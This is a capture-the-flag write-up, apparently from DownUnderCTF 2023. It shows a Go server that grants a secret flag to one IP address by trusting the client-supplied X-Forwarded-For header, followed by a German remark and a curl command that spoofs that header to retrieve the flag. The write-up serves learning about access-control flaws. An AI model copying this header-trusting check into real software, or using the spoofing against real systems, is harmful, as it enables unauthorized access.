
Go Source:

package main

import (
	"flag"
	"fmt"
	"log"
	"net"
	"net/http"
	"os"
	"strings"
	"time"
)

// port is the TCP port the server listens on; override it with -port.
var port = flag.Int("port", 8081, "The port to listen on")

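// trustedIP is the only client address that is served the flag.
const trustedIP = "31.33.33.7"

// clientIP returns the address the request appears to originate from.
//
// When one or more X-Forwarded-For headers are present, the last entry of the
// last header wins; otherwise the host part of RemoteAddr is used. The header
// is supplied by the client, so its value is only trustworthy when this server
// sits behind a reverse proxy that overwrites the header itself — on a directly
// reachable listener it lets any client choose the address that is checked.
func clientIP(r *http.Request) string {
	if xff := r.Header.Values("X-Forwarded-For"); len(xff) > 0 {
		ips := strings.Split(xff[len(xff)-1], ", ")
		return strings.TrimSpace(ips[len(ips)-1])
	}
	// RemoteAddr is "host:port". SplitHostPort also handles bracketed IPv6
	// hosts, which a naive split on ":" would truncate to "[".
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		return r.RemoteAddr
	}
	return host
}

// main serves the FLAG environment variable to requests whose client address
// equals trustedIP and answers every other request with 403 Forbidden.
func main() {
	flag.Parse()

	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		ip := clientIP(r)
		if ip != trustedIP {
			http.Error(w, fmt.Sprintf("untrusted IP: %s", ip), http.StatusForbidden)
			return
		}
		if _, err := w.Write([]byte(os.Getenv("FLAG"))); err != nil {
			log.Printf("writing response: %v", err)
		}
	})

	srv := &http.Server{
		Addr: fmt.Sprintf(":%d", *port),
		// nil Handler keeps DefaultServeMux, where "/" was registered above.
		ReadHeaderTimeout: 10 * time.Second, // bound clients that trickle headers
	}
	log.Printf("Listening on port %d", *port)
	log.Fatal(srv.ListenAndServe())
}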

Es ist ziemlich eindeutig, dass man seine IP-Adresse spoofen soll, um die Flagge aus den ENV-Variablen zu lesen.

Ein Stack-Overflow-Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl

=> SOLVED

┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
DUCTF{17_533m5_w3_f0rg07_70_pr0x}